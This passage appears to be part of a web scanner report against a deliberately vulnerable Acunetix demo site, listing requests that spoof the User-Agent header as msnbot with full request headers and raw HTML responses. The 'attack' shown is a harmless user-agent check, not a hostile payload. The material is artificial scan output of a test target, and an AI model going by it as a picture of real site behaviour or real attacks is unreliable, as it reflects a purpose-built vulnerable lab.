href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/
Method	GET
Parameter	Header User-Agent
Attack	msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Show / hide Request and Response
Request Header - size: 371 bytes.	GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:16 GMT Content-Length: 14133
Response Body - size: 14,133 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" bgcolor="#E6DCCF"> <tr><td colspan="7" bgcolor="#E6B873"><font size="2"><table class="Calendar" cellspacing="0" border="0" width="100%"> <tr><td width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></b></font></td><td align="center" width="70%"><font size="2"><b>December 2022</b></font></td><td align="right" width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></b></font></td></tr> </table></font></td></tr><tr><th align="center" abbr="Sunday" scope="col"><font size="2">Sun</font></th><th align="center" abbr="Monday" scope="col"><font size="2">Mon</font></th><th align="center" abbr="Tuesday" scope="col"><font size="2">Tue</font></th><th align="center" abbr="Wednesday" scope="col"><font size="2">Wed</font></th><th align="center" abbr="Thursday" scope="col"><font size="2">Thu</font></th><th align="center" abbr="Friday" scope="col"><font size="2">Fri</font></th><th align="center" abbr="Saturday" scope="col"><font size="2">Sat</font></th></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></font></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/about.aspx
Method	GET
Parameter	Header User-Agent
Attack	msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Show / hide Request and Response
Request Header - size: 422 bytes.	GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:18 GMT Content-Length: 14686
Response Body - size: 14,686 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw" /> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" bgcolor="#E6DCCF"> <tr><td colspan="7" bgcolor="#E6B873"><font size="2"><table class="Calendar" cellspacing="0" border="0" width="100%"> <tr><td width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></b></font></td><td align="center" width="70%"><font size="2"><b>December 2022</b></font></td><td align="right" width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next 